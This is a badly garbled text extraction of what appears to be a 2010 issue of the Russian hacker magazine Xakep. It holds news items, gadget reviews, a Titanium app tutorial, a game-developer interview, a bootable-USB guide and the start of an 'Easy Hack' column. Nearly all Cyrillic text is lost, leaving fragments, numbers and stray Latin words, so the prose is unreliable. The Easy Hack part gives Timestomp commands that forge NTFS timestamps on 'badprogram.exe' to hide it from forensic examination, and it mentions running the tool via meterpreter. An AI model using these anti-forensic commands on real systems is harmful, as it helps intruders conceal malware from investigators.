Вы находитесь на странице: 1из 148

.

66

x 09 () 2010

.
210
:

CMS :

09 (140) 2010

/ STUXNET

JIT SPRAY


0DAY-

DEP ASLR
. 70

. 37



STUXNET
. 54

140


WI-FI
WINDOWS 7

TITANIUM

TDSS




. 82

INTRO
-2010. ,

.
,
,
,
!

Stuxnet, ?
.

DEP/ASLR?
!
CMS ?
0day!

nikitozz, . .


IBM - Lotus Symphony (. 37).
?

P.S. http://vkontakte.ru/club10933209
.

CONTENT
MegaNews

MALWARE

004

082

TDSS

086

HookFAQ: hard version

FERRUM
016
018
024

ASUS N53Jn

032
036
038

090

- NAS Synology DS210+

PC_ZONE
026

Titanium

game-developer'

Royal Flash,

042

Easy-Hack

048

054

Windows
Stuxnet

058

062

066

070

JIT SPRAY ! JIT SPRAY!

076

080

X-Tools

Windows 7

0day- CMS

Dlink 2500U

096

100

D-Bus

104

SMS- Android

108

112

Qt, Android

C++

SYN/ACK
116

120

125

130

Forefront UAG

OpenSolaris

134

PSYCHO: ,

140

FAQ UNITED

143

144

WWW2

FAQ

8.5

web-

032


game-developer'

054

Windows
Stuxnet

-Bus

096

066


D-Bus

0day- CMS

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>

Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN/ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)

Dr. Klouniz
(alexander@real.xakep.ru)
>

> xakep.ru
(xa@real.xakep.ru)

/ART

>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)

/DVD

>
Step
(step@real.xakep.ru)

> Unix-
Ant
>

/PUBLISHING
>
, 119021, , .
, . 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>

>

>

>

>

>

>PR-

>

>

>

/ .: (495) 935-7034, : (495) 780-8824


> GAMES & DIGITAL
(goryacheva@gameland.ru)

>



> Gameland TV

(rumyantseva@gameland.ru)
>
(strekneva@gameland.ru)
>

>


>
(ashomko@gameland.ru)
> -
(alekseeva@gameland.ru)

>

(korenfeld@gameland.ru)
>


/:

/ .: (495) 935-4034, : (495) 780-8824


>
(kosheleva@gameland.ru)
>

(goncharova@gameland.ru)
>
(lukicheva@gameland.ru)

> :

,
: claim@gameland.ru.
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

. :

. ,

,
.
.


.
.

:
content@gameland.ru
, , 2010

MEGANEWS

MIFRILL

MARIA.NEFEDOVA@GLC.RU

MEGANEWS

...



teh Internet.
60

,
, 1-
.
, (
, , ).
Wi-Fi , -,


- .
,
,
, . , -


. , , ,
, ,
. ,
, Wi-Fi-.

100- Blu-ray
BDXL. $60, 100
(3 ) 128 (4 ) .


, ,
90- , Mortal Combat
? , , . -, , ,
, ,
, . ,
, Hyperkin RetroN 3,
Nintendo, Super Nintendo Sega Genesis.
. RetroN 3 ,
. ,
, ,
Sega. , , , 90- ,
RetroN 3 ( )
. 70 , ! :)

004

X 09 /140/ 10

MEGANEWS


!
Pirate Party , ,


,
. ,

, .

The Pirate Bay
?
, ,
TPB .
; !
PirateISP,
, ,

ViaEuropa.

,



.

$70, 70 ? ,

, .
Ch Russo
. ,
TPB ,
SQL-.

, 4 .
.


, . Google
, , .
.


,

, .


. ,
-

,
. ,

, , .
,

.

, Acer Asus,
: Quanta Computer, Compal
Electronics, Wistron ..


(IEEE).
; ,
,
. , ,

-.

WINDOWS !
2002 Microsoft -
( ,
, ) .
,
Windows XP, Windows 2000
Windows Server 2000. ,
Windows 7, Microsoft Windows Server 2008 R2, Microsoft Office
2010 Microsoft SQL Server.
: ,
Microsoft , -

006

, !
,
, . ,
- . ,
Microsoft.
Government Security Program (GSP),
.
Microsoft
. ? : 10% Microsoft .
X 09 /140/ 10

MEGANEWS


Imperia, ,
Login Spoofer 2010, 200 000
. ,
... . ,
Login Spoofer 2010 , -,
.
- .
,
.., ,
.
.
-, , ,
, , . ,
,

, . :
, - ,
. !

Mozilla Google .
$3000 $3133.7

ZEUS
ZeuS/Zbot


.

,

,
, ZeuS
, ! Trend Micro
,

ZeuS
. , -
( ), , ,
. ZeuS, , 24, , 24.,
( ), ., Webmoney, RBK Money, e-port QIWI .
, ,
. , . ,
,
.

Amazon ,
. 100
180 .



15. , QR ,
, .
, . ,
: 27 ,
.
, .

008

, ,
,
. , , , ,
. ,
11 , ; , . , , , ,
, - ,
.
X 09 /140/ 10

MEGANEWS


- Elektronic Tribulation Army (ETA)
.
- -, ETA , , - . , (aka GhostExodus),
. ,
( RxBot). ,
, , , Windows, LogMeIn (www.logmein.com). ETA,
DDoS- . , YouTube,
IP ! ,
. 25-
.

, .
, .
,
, , , .
,
- DDoS,

. GhostExodus
, .
, , ,
. ETA
. ,
... , .
. , -

, DDoS,
.
, Fixer, dev//null Xon -
, .

.
: .
- .

BREIN
420 , 384 -.

-
,
. , Tamatebako
Fujitsu , , ,
. 2- AES-
256 .
, Tamatebako
.
, :
; ;
( 10
7 ). 707024 , 45 . ,
Tamatebako , ,
,
.

010

X 09 /140/ 10

11

MEGANEWS

ASUS
, , Tefal ? Tefal , , , Asus.
,
. Asus
TurboV EPU (Energy Processing Unit),
. ,
,
. TurboV
,
37%! EPU, ,
, , ,
-, ,
.
,
BIOS , ,
. ,
Asus .
Asus
.

Avast : 100 , ,
XXX-. -
.

VS
Hack In
The Box .
HITB , The Underground Economy
( ). , ,
. ,

,
. , ,
, . , - , , , ,
. HITB , ,
,
. , ,
. ,
Mediaservice.net 18 ,
,
. HITB

. .

012

X 09 /140/ 10



, ,
,
, ,
,
. ,
Asetek,
. Asetek
100%,

58 !

, , ,

. ,
, iMac 24-
, Intel
Core i7-920 (130 ) 2.66 -

NVIDIA GeForce GTX280M (75 ).



, , ,
,
. , , ,
Asetek .
, ,

.

Twitter
( ).
, - !


,
, .

- SGR-1,
Samsung.
: ,
5.5- 40-
, , , . ,

$200 000, ,
.

, , .
SGR-1,
160
,
(
), - , ,

. Skynet !

,
,
.

66% - The Times,

( )

,

, 100,
, . , ,
X 09 /140/ 10

,
.
,
,
. Swiftpoint
, ,
, - . Swiftpoint
-,
-
.
,
.
- , ,

,
.
,
.
-, USB, , , 30
1 !
,
3-4 . , , ,
- 68
. 2 ,

, Swiftpoint
.

013

MEGANEWS


,
,
XX ,

. ,
, , - ,
Coulomb Technologies.

;
37 . , 15
.

,
Coulomb Technologies
.
,

12-16 ,
, 20 4 . ,
General Electric. GE
WattStation,

Fuseproject. General Electric
,
,


.
WattStation 4-8 .

P2P
, , , . Bitcoin,
peer-to-peer
.
21 .,
. 21 . ,
( 1 .). , , ,
. , -,
, ,
Bitcoin. ,
, . , P2P-
.
, .

, .
-

Bitcoin-.
. -, VoIP-,
VPN . , , ,
. Bitcoin-
www.
bitcoin.org.

128

-, Toshiba

3D
Sony PlayStation 3,
. ,
3D ,
3D .
Sony ,
,
. , , - ,
, , . 3D
, , ,
A1B2C3, ,
ABC, 123.
.
. , , !

014

X 09 /140/ 10

SKYPE !
,
Skype,
, , . ,
`,
, Skype,
.
, Skype , -
. - ,
,
.
Skype,
( ,
).
, . ,
( ),
: ,
RC4, Skype,

cryptolib.com. Skype - :
AES-256, RC4 ( TCP RC4,
UDP RC4 , DH-384 TCP RC4).
AES-256 RC4. , ,
,
AES 256- ,
1024-
RSA .

, , , ,
, . , ,
Skype- ,
- Skype. , , - , The 27th
Chaos Communication Congress, ,
.

73 . Blogetery.com -

X 09 /140/ 10

015

FERRUM

ASUS N53Jn


Computex
Asus N,
.

Asus N53Jn, ,
.

ASUS N53Jn
.
,
.
,
.

016

Num
Pad ,
.
multi-touch,

,
.

,
.

,
,
X 09 /140/ 10

: 15.6" HD (1366x768)
: Intel Core i5-540M 2.53
: Intel HM55
: 4 DDR3 1066
: Intel GMA HD + NVIDIA GeForce GT335M 1024Mb
: 640
: DVD+RW DL
: 1 USB 3.0, 3x USB 2.0, 1x e-SATA, HDMI, VGA, Audio/SPDIF, 7--1
: Wi-Fi 802.11b/g/n, Bluetooth 2.1+EDR, LAN
: 6 , 4400 , Li-ion
: Microsoft Windows 7 Ultimate x64
: 39.1 x 26.6 x 3.05~4.0 c
: 2,71


Asus Leather External HDD
500
USB 3.0. ,
, USB 3.0 10
2.0!

Asus BX700 Bluetooth-


1200 dpi.
.
:
.


NVIDIA
GeForce GT335M Intel GMA HD.
3D-,
.
USB 3.0, HDMI eSATA+USB 2.0

HD- .
, : web- On/off, ,
.
,
. Asus N53Jn
:).

ASUS STREAMLINE MESSENGER ,


, /
. . ,
.
16.

: ( ),
, , .
Express Gate,
IM-.

ASUS N53Jn , .
Intel Core i5-540M , NVIDIA
GeForce GT335M 3D-,
NVIDIA CUDA
GPU: , MD5 HD-. z

,
,
: 33 4 ! : Asus N53Jn SonicMaster
Asus Golden Ear Bang & Olufsen ICEpower. ,
,

.
ASUS N53Jn Mobile
Intel HM55 Express Chipset Intel Core
i5-540M 2,53 .
CPU Super PI 1M:
c Pi
. 15 , .
X 09 /140/ 10

ASUS N
trendclub.ru. Trend
Club ,
. Trend Club
, ,
. Trend Club Intel ASUS
.
Intel,
, , ,
.
Intel Web-
Intel http://www.intel.ru, http://blogs.intel.com. Intel www.intel.ru/rating.

017

FERRUM




,
. ,
LAN, .

, ,
.
, , ,
, , ,
, , , , .

, ,
. ,
, .

018

, -.
.
,
, .
USB, , ,
.
-,
. ,
,
.
X 09 /140/ 10

4500 .

11600 .

3Q 3QMMP
F330HW
:

: ETHERNET 10/100 /
: HDMI ( 1080I), , , RCA, 3X USB 2.0, 1X USB 2.0 SLAVE
: WI-FI 802.11 B/G
: MPEG-1, MPEG-2, MPEG-4, WMV9,
MPEG-2 HD TS, MPEG-4 ASP L5 ( GMC), DVD-VIDEO SUPERBIT DVD,
H.264, MKV, XVID, DIVX. :MPEG 1, 2, 4, AVI, WMV, MPG, ISO,
VOB, IFO, MP4, ASF, TP, TRP, TS, H.264 (MKV. MOV),
MP3, .AAC, .OGG, .WMA, .WAV, .AC3, ( DTS PASS
THROUGH), .FLAC, .PCM, .M4A
: 1080I
: HDD, USB HDD,

HDD :
, : 187X193X60

, , , . :

. , ( HDMI).
,
, ,
. ,
.
X 09 /140/ 10

BBK
NP101S
:

: ETHERNET 10/100 /
: HDMI ( 1080P), , S-VIDEO, , S/PDIF, 2X USB 2.0
: N/A
: MPEG1/2/4 ELEMENTARY (M1V,
M2V, M4V), MPEG1/2 PS (M2P, MPG), MPEG2 TRANSPORT STREAM (TS,
TP, TRP, M2T, M2TS, MTS), VOB, AVI, ASF, WMV, MATROSKA (MKV), MOV
(H.264), MP4, RMP4, AAC, M4A, MPEG AUDIO (MP1, MP2, MP3, MPA), WAV,
WMA
: 1080P
HDD : 2
, : 270X132X32

, , ,
, .
,
FTP-, -,
, , , Google Maps.
.
: ( )
,
. :
.

019

FERRUM

2000 .

5900 .

ICONBIT
HDS6L
:

: ETHERNET 10/100 /
: HDMI1.3 ( - -),
(YPBPR), , SCART,
TOSLINK, SPDIF(5.1 DOLBY DIGITAL), (AUDIO
R/L), 2X USB 2.0, ESATA
: WI-FI 802.11N ( USB)
: H.264, VC-1, M-JPEG, WMV9, MPEG
1/2/4, HD DIVX , XVID, FLV, RM/RMVB, MKV, TS, M2TS, MTS, TP, TRP, WMV,
IFO, ISO, VOB, DAT, AVI, MPG, MP4, MOV, RM, RMVB, DIVX, XVID, FLV, MP3,
WMA, WAV, OGG, AAC, LPCM, FLAC, AC3, DTS, DTS HD, WAV [.WAV, .PCM],
ADIF, ADTS [.AAC], M4A [.M4A], OGG [.OGG], ASF/WMA [.ASF, .WMA], FLAC
[.FLAC]
: 1920X1080P
HDD :
, : 230X60X167

, ( , ) . ,
, YouTube, Picasa Flickr,
-, ,
. ,
SATA-, , USB. , ? ,
HDMI- ,
.

020

ONEXT MULTIMEDIA
BOX M-Box 1
:

: ETHERNET 10/100 /
: 2X USB, SD
: N/A
: REAL VIDEO 8/9/10 REALAUDIO
AAC AUDIO (*.RM, *.RMVB,) MPEG 1 MPEG 2 LAYER I, II, III, AC3*
AUDIO (*.MPG, *.MPEG, *.DAT) MPEG4 MP3 AUDIO (*.AVI), MP3, WMA
:
: USB, SD
HDD :
, : 1158822

,
, ,
,
. ,
: LAN,
, SD, SATA,
,
USB. ,

-, ,
. , ,
,
, ONEXT Multimedia BOX M-Box 1.
X 09 /140/ 10

FERRUM

3800 .

3500 .

SEAGATE FREEAGENT
Theater

WESTERN DIGITAL
WD TV Live


, . , ,
, . ,
, ,
.
,
.
USB, a SATA ,
USB- , .
USB-.
, Seagate FreeAgent Theater Flickr, YouTube -.

,
HDD ,
,
LAN USB,
. Ethernet-
HD- ,
: .

-, YouTube,
:
, - .

: ETHERNET 10/100 /
: HDMI 1.3, , , 2X USB, LAN,
USB
: WI-FI
: MKV; AVI; DIVX; DIVX HD; RMVB REAL
MEDIA; WMV9; VC-1; MPEG-1; MPEG-2 (VOB/ISO); MPEG-4 (XVID); XVID
HD; MOV; AVC HD; H.264; M2TS; TS/TP/M2T; AAC; MP3; DOLBY DIGITAL;
DTS; FLAC; ASF; ADPCM; LPCM; OGG; WMA; WAV; JPEG FILES (UP TO 20
MEGAPIXELS); BMP; TIFF; PNG; GIF
: 1080I
: USB, LAN
HDD :
, : 31X183X180

,
.

022

: ETHERNET 10/100 /
: ETHERNET; HDMI; A/V; ; USB 2.0
:
USB
: AVI (XVID); AVC; MPEG1/2/4); MPG/
MPEG; VOB; MKV (H.264; X.264; AVC; MPEG1/2/4; VC-1); TS/TP/M2T
(MPEG1/2/4; AVC; VC-1); MP4/MOV (MPEG4; H.264); M2TS; WMV9; JPEG;
GIF; TIF/TIFF; BMP; PNG; MP3; WAV/PCM/LPCM; WMA; AAC; FLAC; MKA;
AIF/AIFF; OGG; DOLBY DIGITAL; DTS
: 1920X1080P24
: USB, LAN
HDD :
, : 40X100X126

ICONBIT
HDS6L -,
WD TV Live, /. z
X 09 /140/ 10

, .
, - .
PocketBook 301.
Netronix Inc., .

.
PocketBook

E-Ink (6", Vizplex 600x800,
166 dpi)

,


.
,
.


PocketBook 301

.

,

,
.


512
,
SD
1 2 (
).

Samsung 400,
64
.




. PocketBook 301
FB2, TXT,
PDF, DJVU, RTF, HTML,
PRC, CHM, EPUB, DOC, TCR,
FB2.ZIP. ,

,
.


PocketBook 301
,


,


,

X 09 /140/ 10


,
,

,
.

(1000 mAh)
8000
.


8 14 .

,


: E-ink
, !


:
, , ,
.
,

. PocketBook 301

. :
118x188x8,5 .

023

FERRUM

- NAS SYNOLOGY DS210+

, ,
.
, ,
, .


RAID-,
. , , HDD,
FreeBSD : CIFS, SMB ..
:). ,
,
.
:

024

, ,
, - ,
- .

:
NAS (Network Attached
Storage).
: , iPad,
, HD .
, ,


, Windows Media
Player,
.
.
NAS Synology: DS210+.

NAS

embedded-,
DS210+
X 09 /140/ 10

. , : storage- 1,06 Freesale


512 DDR2,
Linux.

. ,

, ,
.
, ,
, .
, HDD NAS,
,
.
SATA- (
DS210+ ). ,

eSATA USB, . DS210+
eSATA 3 USB . ,
USB ,
IP-, . ,
NAS,
, ,

. .
,
,


DS210+
, .

,
, ,
, . .
X 09 /140/ 10

NAS
,
.
DS210+, ,
31 /.
, . , ,
.
:
Wi-Fi ,
USB NAS. 802.11n ,

,
100 .
,
NAS
!
:
? .

, .
:
SMART ?
, , ,
,
NAS.
- ,
RAID 1
.
HDD , ,
e-mail, . SMS. ,

SMS- Clickatel (www.clickatell.com)
.
S.M.A.R.T bad-, NAS
,
.

Synology DiskStation Manager.

SYNOLOGY DSM

Synology DSM 2.3 .


,
. CD- NAS
Synology Assistant
,
IP-
Synology.
NAS ,
.
pat- ,
.
,

. ,
( Synology
Assistant) -

CD, www.synology.su
synology.com.
:
NAS
Synology -- Disk Station Manager (DSM).
, NAS -,

AJAX. Synology DSM
,
.

.
iSCSI
,


. Windows XP-Vista-7/Mac OS
X
iSCSI
, . ,
, ,
iSCSI kernel
2.6.12. ,
FTP, NFS,
SAMBA/CIFS AFP ( )
.

,

.

, ,
,

,
.
, DLNA/UPnP,
,
.
iTunes,
iTunes

music, video
photo.

DS210+ -
- (

),
.

,
. ,
. ,
- , , , torrent,
.
. z

025

PC_ZONE
aleks.raiden@gmail.com


Titanium
, .
,
iPhone/iPad, Android, ,
. Appcelerator
Titanium,
.

,
. Ubuntu Mandriva
Linux,
-, Windows ( ?),
. MacOS
. ?
, , , . Apple -
iPad/iPhone
iOS, Google Android OS,
Windows Mobile, Nokia, , BlackBerry
. . .
, , . !
, Java, , , , . Java- (
, , , Java),
. Android

026

Java, . , ,
, , API, iPad/
iPod/iPhone
.
, , -.
Appcelerator,

Titanium. , ,
( , ),
, .
, API, :
Windows, Linux, MacOS ! ?

Appcelerator Titanium -.
- ,
, X 09 /140/ 10

, API
,

, . .
-:
HTML 5, CSS JavaScript.
- . ,
Titanuim
, ,
. , -,

: Python, Ruby PHP.
, : - , Windows, Linux
Android? -!
Titanuim
.
: ,
, HTML- . - , API-, Titanium.
, : , ,
Blackberry
?. API ,


,
, .
Appcelerator ,
. Kroll C++,
,
,
.
, (JavaScript, C/C++, Python, Ruby, PHP),
Module API. ,
Binding
API, ,
.
() Kroll .
Java, C#/
Mono Lua. Github
www.github.com/appcelerator/kroll

X 09 /140/ 10


. tiapp.xml
- , . runtime- ( ),
,
.
- Webkit,
HTML/CSS,
JavaScript-. . ,
, PHP Ruby, .
API ,
, ,
. ,
, , SDK
.
Titatium , , ,
. , ,
, .
, runtime- .
,
.
Appcelerator
,
.

,
. : ,
, -
.
, ,
. ,
Titanium
( bundled). , Network;

. - -

HTTP://WWW
links

:
www.appcelerator.
com
API:
developer.
appcelerator.com/
documentation
:
www.appcelerator.
com/showcase/
applicationsshowcase
:
developer.
appcelerator.com/
training


: www.
devx.com/wireless/
Article/45208/
1954?pf=true

027

PC_ZONE


.

,
, , .
,
, ,
.

API

, ,
API.
, .
,
, ,
.
Database SQLite, .
Network
. , ,
-: Comet,
WebSokets . , , : HTTP- , IRC-.
Worker , ,
, HTML5. -
, , ,
, ,
.
UI ,
. Titanium
, ,
- JavaScript,
HTML5.
.
. , , , VP8/WebM. ,
, Adobe AIR, .
Analytics
. - Google Analytics,
. , , ,
, ,
.
UpdateManager .
, , -

028


WebKit- Inspector
, API UpdateManager,
. :
,
.
, API
.
, .. , , - ,
, .
,
Facebook,
, (
). - :
,
( , , ). , ,
API Android iPad/iPhone,
,
.
, API , ,
PHP, Ruby
JavaScript,
(
). DOM-
. , , JavaScript, , ,
,
?

TITANIUM VS ADOBE AIR


, AIR Adobe, , , RIA-
. , , AIR,
Titanium .
,
, .
.
AIR- .

. , . , AIR
,
. , ,
AIR 64- Linux?

X 09 /140/ 10

X 09 /140/ 10

037

PC_ZONE

INFO

info

,

Android.

JDK
Android SDK.
Apple
MacOS,
, iPad


.

DVD
dvd


, SDK
,

,
,

.

Titanium:

,
Titanium.
www.appcelerator.
com, .
Resources,
. ,
.
, (
),
tiapp.xml. ,
. , ,
, . ,
( ,
),
, .
HTML- .
, URL ?
. ,
, .
-
-, ,
WebKit, .

.
Titanium Developer, ,
tiapp.xml,
:
<?xml version='1.0' encoding='UTF-8'?>
<ti:app xmlns:ti='http://ti.appcelerator.
org'>
<id>ru.xaker.www</id>
<name>Xaker WebApp</name>
<version>1.0</version>
<publisher>Vasja Pupkin</publisher>
<url>http://xakep.ru</url>
<icon>default_app_logo.png</icon>
<window>
<id>initial</id>
<title>Xakep WebApp</title>
<url>http://xakep.ru</url>

030

<width>700</width>
<max-width>3000</max-width>
<min-width>0</min-width>
<height>500</height>
<max-height>3000</max-height>
<min-height>0</min-height>
<fullscreen>true</fullscreen>
<resizable>true</resizable>
<chrome scrollbars="true">true
</chrome>
<maximizable>true</maximizable>
<minimizable>true</minimizable>
<closeable>true</closeable>
</window>
</ti:app>

,
<Esc>
, .

dist, .
, -,
read-only, -,
.

.

, Titanium !
API ,
? ! API ,
,

. ,
Android iPhone. ,
Mac Apple. Apple
AppStore , , Titanium

. z
X 08 /139/ 10

PC_ZONE
Johnny-K www.johnny-k.ru, Badim blog.elite-games.net


game-developer'

, , Flash-,
. ?
: .
Johnny-K, Flash' . 150 .

, ,
. :
Roly-Poly Cannon 3, Ragdoll Cannon 3 , .
: Cover Orange Roly-Poly
Eliminator iPad' ,
: , ? iPad', ,
. , :
. -
, - , ,
.

032

,
.
, .
- , , .
. , , .
. .
, , ,
. . . ,
, . X 09 /140/ 10

NailNoid

: .
, , , :).
.
- . , - . , ,
- (,
, ).
, -,
. , .
. ,
Activision Crytek,
. .
,
, , Activision?
, , .
( , , ), . ,
,
DVDBox' , ,
. ,
. 865$ , ,
3 ,
. , , , . .

, ,
. , , . .
, Flash . ,
.
. ,
.
, , .
, , , - , -- . . Flash, , ActionScript. Java C#,
. ,
, ,
, . - . , , . ,
, , , .
,
- . !
. , , , -
. : . . , .
X 09 /140/ 10

- , ,
, . . , .
55- bmp-. -
. , ,
, ,
. , ,
. , ,
: -
. , :
!
- , , .
- , , , .
Nailnoid,
,
. , ? .
, if .
- ,
.
.
- FGL, .
: .
, ?. 300
. 4 300 .
,
300 . : 600 , 4 .
? .

,
, . , , !
,
, .
3- : , , .
, , .
, , .
, Flash' ? .
Box2D (www.
box2d.org). , . Ragdoll Cannon,
Ragdoll Voleyball. Ragdoll Box2d.
Johnny-K $5000, Flash
. , Flash
.
, www.
emanueleferonato.com, www.tonypa.pri.ee, www.kongregate.com/labs.
.
, : -

033

PC_ZONE

RagDoll Cannon

? ! ,
. Flash- - ,

. , ,
, ,
- (sprite-sheets). ,
, (Megaman, Zelda, Sonic).
, , ,
. ,
,
.
, , ,
. : .
: -
, ,
.
, , ,
. , .
, , , .
, . ,
, , .
- , . - , , , . ,
.
, , ,
.

, . ?
-. : ,
. -.
. ,
, ,
. ,
. ,
-.
, , ,
, .
,
. ,
,
.
, -
: www.newgrounds.com www.kongregate.com.
,

034

( ),
. , Ragdoll Cannon 2
. 1500 .
, .

,
? ? ,
:
! : () -
, -.
: ,
,
.
, , ,
,
, ,
. . . More
games. $100 $40000 , .
:
, ,
. ,
, .
: ,

-.
, :
. :
- , . ,

?
. :
- ( )
.
, .
, , , Mochi Ads (www.mochimedia.com)
CPMStar (www.cpmstar.com), .
, .
. , , $10000,
. 500-1000 .

X 09 /140/ 10

Poly-Poly Cannon ,

INFO

info


flash- kongregate.com:

. ,
, 15 ,
. , 15
, ,
.
:
10 ,
10 .
?
Flash', ,
. , ,
FGL (www.flashgamelicense.com). ,
.
: .
, , , ,
. , .
2-
4- . ,
, , $5000? .
: 10%
. -
: ,
. , ,
, .
,
. ,
X 09 /140/ 10

FGL
,

.
, - :
(
).


-, . , .
. , .
,
. -
. (
!). , , ,
.
P.S. iPhone/iPad,
. Ragdoll
Cannon.
. ,
, . - :
.
, ,
. Ragdoll
Blaster. ?

. :).z


,

(
,
).


,
,
.

HTTP://WWW
links
Flash:
flashgamedev.ru


:
blog.elite-games.net

035

PC_ZONE
STEP TWITTER.COM/STEPAH


, ,
.
.
IMEI .
,
- , , , ,
. .
, ,
, , MAC-
.
, ,
-,
. ,
, MAC-, MAC (
).
, MAC-
: . ,
, .
, .
Hamachi -

036

, IM-
VPN-. , ,
, IP-. ,
,

.
,
( IP-).
, .

Prey (www.preyproject.
com). ,
: Windows, Mac Linux,

Android. ?
! Prey
URL, ,
.
( !),

. ,
-
, Prey
. ,

, ,
.
: Prey
+ Control Pane Prey Standalone.

,

. Prey Standalone ,
,
email.
,
, . ,

,
.
- .
: , -,
.. Geo
,

GPS,
: Prey ESSID

. Wallpaper:
, .
,
.
TeamViewer (www.teamviewer.com/ru),

, IP-. z

:
X 09 /140/ 10

>> coding

lotus.xakep.ru

X-testing ontest
-
IBM Lotus Symphony 3.
Lotusphere 2011 !

DVD

- Lotus Symphony 3

,
Lotus Symphony Beta 3
lotus.xakep.ru. :
,
!

PC_ZONE
"Step" twitter.com/stepah

Royal Flash,



,
. , . , .
,
, LiveCD .

,
,
. ,
( , - ),
USB-. ,
,
:). , .
,
.
USB- , - (
). , , ,
. ,
.
(), ,
, , -

038

, , ,
USB-.
.
- ,
RAW , ,
.

. , .
,
: , ,
. , . , ,
, ,
. ,
- , .
, , R-Studio (www.r-studio.com/ru) PhotoRec (www.
cgsecurity.org/wiki/PhotoRec). ,
X 09 /140/ 10

Alcor

VID PID Chip


Genius
, .
.

, ,
, , .
, ,
. ,
, : . ,
(
, ?),
. ,
. , ,
. VID ( ) PID ( ) , ,
.
: ChipGenius, CheckUDisk, USBDeview, UsbIDCheck,
, , . : ?
iFlash www.flashboot.ru, ,
, .
VID, PID . , VID = 8086, PID = 3A37. ,
ALCOR, ,
.
; , , flashboot.ru, ,
. , .
, , , . ,
, , , .
, , . .

LIVECD

. ? :)
(Dropbox ), - .
X 09 /140/ 10

,
. - USB-
Backtrack ,
Linux.
, ,
, , LiveCD. , Linux (Fedora, Ubuntu ) , :
Dr.Web LiveCD (www.freedrweb.com/livecd), F-Secure Rescue CD
(www.f-secure.com), Kaspersky Rescue Disk (support.kaspersky.ru/
viruses/rescuedisk)
, ,
.
Ophcrack (ophcrack.sourceforge.net) NTPasswd (home.eunet.no/
pnordahl/ntpasswd) , .
Parted Magic (partedmagic.com) GParted (gparted.sourceforge.net)
, Partition Magic, .
Memtest86+ (www.memtest.org) MHDD (www.ihdd.ru/mhdd)

.
, , LiveCD,
, . ,
(!) , UNetbootin
(unetbootin.sourceforge.net),
ISO-. ,
LiveCD, , .
, ISO, . , ,
. . ,
.

, ,
. grub4dos (code.
google.com/p/grub4dos-chenall) . ,
: grldr. ,
( ),
MBR .
grubinst (download.gna.org/
grubutil). -

039

PC_ZONE

!
3. menu.lst , .

,
: Memtest86+
( , ) Offline NT Password & Registry Editor

INSIDE

Grub4Dos

, GUI- .
, ,
Disk. ,
, ,
. ,
: hd1, hd2
.. : ,
MBR
. , . , ,
Refresh .
, ,
. ,
Install , MBR. ;
. , ,
, .
grub4dos,
.
LiveCD- ISO-.
:
1. ISO .
2. menu.lst
grub4dos, .
.

040

,
. ,
.
NAND ,
. USB-, .

1 USB-, 2 , 3
( ) , 4
, 5 , 6. , 7
" ", 8
.

X 09 /140/ 10

VID PID !
, .
USB .
VID PID
0000. ,
,
.
[a1]
.
(),
, . :
1. USB-
29 30 . , ,
, ,
, : 30-31, 31-32, 41-42, 42-43, 43-44.
,
. :
, , ( 37).
2. ,
USB-.
, . , .
, ,
, .

Windows .
, iso, ISO- memtest ntpasswd.
X 09 /140/ 10

INFO

info


menu.lst
:
title Memtest
map (hd0,0)/iso/memtest/mt410.iso (hd32)
map --hook
root (hd32)
chainloader (hd32)
boot
title Offline NT Password & Registry Editor
map (hd0,0)/iso/ntpasswd/cd100627.iso (hd32)
map --hook
root (hd32)
chainloader (hd32)
boot


Title, ISO map.
, . . USB-,
grub4dos .
LiveCD-: Backtack, Ophcrack,
Kaspersky Rescue Disk .
.
, , ISO-
.
GUI- WinContig (wincontig.mdtzone.it/en).
grub4dos
,
(greenflash.su/Grub4Dos/Grub4dos.
htm). menu.lst,
.
MultiBootISOs (www.pendrivelinux.com/bootmultiple-iso-from-usb-multiboot-usb).
Syslinux
grub4dos,
ISO-,
. ,
ISO ,
MultiBootISOs .
LiveCD- Linux (Ubuntu, Fedora, OpenSUSE ..),

: GParted, Ophcrack ..
Windows 7. ,
8, 16 .. z

Microsoft

USB-
Windows 7 USB/
DVD Download Tool
(store.microsoft.com/
Help/ISO-Tool),
Windows.

DVD
dvd

,
LiveCD


.

WARNING

info

.

.

041


GreenDog agrrrdog@gmail.com

Easy Hack
1

:
NTFS ( ,
, , MFT)

:

, , , ,
. ,
( , )
/. . , James C. Foster Vincent Liu
BlachHatt 2005 , Timestomp. -
.
. NTFS (),
(M), (A),
MFT (E). MFT (Master File Table). MFT
- ,
( ).
(MACE)
$FILE_NAME, $STANDARD_INFORMATION.
8 .
, Timestomp MACE $STANDARD_
INFORMATION . , ,
.
forensicswiki.org/wiki/
Timestomp, (metasploit.com/data/
antiforensics/timestomp.exe) DVD.
:
Timestomp.exe _/

:
-m / -a / -c / -e / -z / /
/ MFT / ;
-f _ ;
, Timestomp

Timestomp Metasploit

-b ( 1/1/1601);
-r (
/);
-v .
:
_ // :: _
(AM/PM)
, .
, cmd.exe
badprogram.exe:
timestomp.exe badprogram.exe -f c:\WINDOWS\system32\cmd.exe

MFT badprogram.exe:
timestomp.exe badprogram.exe -e "Monday 11/13/2011 11:11:11
PM"

, .
Timestomp $STANDARD_INFORMATION,
, $FILE_NAME MFT.
, -,

042

X 09 /140/ 10

, $STANDARD_INFORMATION,
-, , $FILE_NAME, $STANDARD_INFORMATION.
. Timestomp -b ( -r),
MACE. -
, ,
GMT . ,

GMT+3 . ,
.
. Timestomp ( ) Metasploit.
meterpretere use priv, ( ). , , meterpreter
.

:
.

:

,
. , -,
. ,
, ... ,
. :
.
, Webscarab
OWASP. Webscarab , .
-,
. OWASPa,
Jva , .
owasp.org/index.php/Category:OWASP_WebScarab_Project.
Webscarab ,
( - )
( 127.0.0.1 8008 ).
.
:
HTTP/HTTPS- ( )
HTTP-
-
/ /
/ Bean
shell

XSS/CSRF-

... ..

: ,
GPU

:
, - ! ,
, , !
Starcraft! , ,
:). .
, ,
, , .
, , ,
,
X 09 /140/ 10

HTTP- Webscarab
, !
:). Webscarab ,
( 2005, 2006 ).
. .
, ( :)).
Kuzya ! Webscarab . : forum.antichat.
ru/thread106452.html.
yehg.net/lab/pr0js/training/webscarab.php.
. , Webscarab , OWASP Webscarab_NG. ,
Webscarab, - ( , ).
